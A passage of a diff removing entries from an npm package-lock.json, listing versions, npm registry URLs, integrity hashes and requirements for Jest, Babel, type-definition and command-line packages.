"resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@opentelemetry/api": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz", - "integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==" - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@swc/helpers": { - "version": "0.5.17", - "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.17.tgz", - "integrity": "sha512-5IKx/Y13RsYd+sauPb2x+U/xZikHjolzfuDgTAl/Tdf3Q8rslRvC19NKDLgAJQ6wsqADk10ntlv08nPFw/gO/A==", - "requires": { - "tslib": "^2.8.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/command-line-args": { - "version": "5.2.3", - "resolved": "https://registry.npmjs.org/@types/command-line-args/-/command-line-args-5.2.3.tgz", - "integrity": "sha512-uv0aG6R0Y8WHZLTamZwtfsDLVRnOa+n+n5rEvFWL5Na5gZ8V2Teab/duDPFzIIIhs9qizDpcavCusCLJZu62Kw==" - }, - "@types/command-line-usage": { - "version": "5.0.4", - "resolved": "https://registry.npmjs.org/@types/command-line-usage/-/command-line-usage-5.0.4.tgz", - "integrity": "sha512-BwR5KP3Es/CSht0xqBcUXS3qCAUVXwpRKsV2+arxeb65atasuXG9LykC9Ab10Cw3s2raH92ZqOeILaQbsB2ACg==" - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "20.17.46", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.46.tgz", - "integrity": "sha512-0PQHLhZPWOxGW4auogW0eOQAuNIlCYvibIpG67ja0TOJ6/sehu+1en7sfceUn+QQtx4Rk3GxbLNwPh0Cav7TWw==", - "requires": { - "undici-types": "~6.19.2" - } - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "apache-arrow": { - "version": "19.0.1", - "resolved": "https://registry.npmjs.org/apache-arrow/-/apache-arrow-19.0.1.tgz", - "integrity": "sha512-APmMLzS4qbTivLrPdQXexGM4JRr+0g62QDaobzEvip/FdQIrv2qLy0mD5Qdmw4buydtVJgbFeKR8f59I6PPGDg==", - "requires": { - "@swc/helpers": "^0.5.11", - "@types/command-line-args": "^5.2.3", - "@types/command-line-usage": "^5.0.4", - "@types/node": "^20.13.0", - "command-line-args": "^6.0.1", - "command-line-usage": "^7.0.1", - "flatbuffers": "^24.3.25", - "json-bignum": "^0.0.3", - "tslib": "^2.6.2" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "array-back": { - "version": "6.2.2", - "resolved": "https://registry.npmjs.org/array-back/-/array-back-6.2.2.tgz", - "integrity": "sha512-gUAZ7HPyb4SJczXAMUXMGAvI976JoK3qEx9v1FTmeYuJj0IBiaKttG1ydtGKdkfqWkIkouke7nG8ufGy77+Cvw==" - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "requires": { - "fill-range": "^7.0.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001517", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001517.tgz", - "integrity": "sha512-Vdhm5S11DaFVLlyiKu4hiUTkpZu+y1KA/rZZqVQfOD5YdDT/eQKlkt7NaE0WGOFgX32diqt9MiP9CAiFeRklaA==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "chalk-template": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/chalk-template/-/chalk-template-0.4.0.tgz", - "integrity": "sha512-/ghrgmhfY8RaSdeo43hNXxpoHAtxdbskUHjPpfqUWGttFgycUhYPGx3YZBCnUCvOa7Doivn1IZec3DEGFoMgLg==", - "requires": { - "chalk": "^4.1.2" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "command-line-args": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-6.0.1.tgz", - "integrity": "sha512-Jr3eByUjqyK0qd8W0SGFW1nZwqCaNCtbXjRo2cRJC1OYxWl3MZ5t1US3jq+cO4sPavqgw4l9BMGX0CBe+trepg==", - "requires": { - "array-back": "^6.2.2", - "find-replace": "^5.0.2", - "lodash.camelcase": "^4.3.0", - "typical": "^7.2.0" - } - }, - "command-line-usage": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/command-line-usage/-/command-line-usage-7.0.3.tgz", - "integrity": "sha512-PqMLy5+YGwhMh1wS04mVG44oqDsgyLRSKJBdOo1bnYhMKBW65gZF1dRp2OZRhiTjgUHljy99qkO7bsctLaw35Q==", - "requires": { - "array-back": "^6.2.2", - "chalk-template": "^0.4.0", - "table-layout": "^4.1.0", - "typical": "^7.1.1" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.4.0", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", - "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", - "requires": { - "ms": "^2.1.3" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": 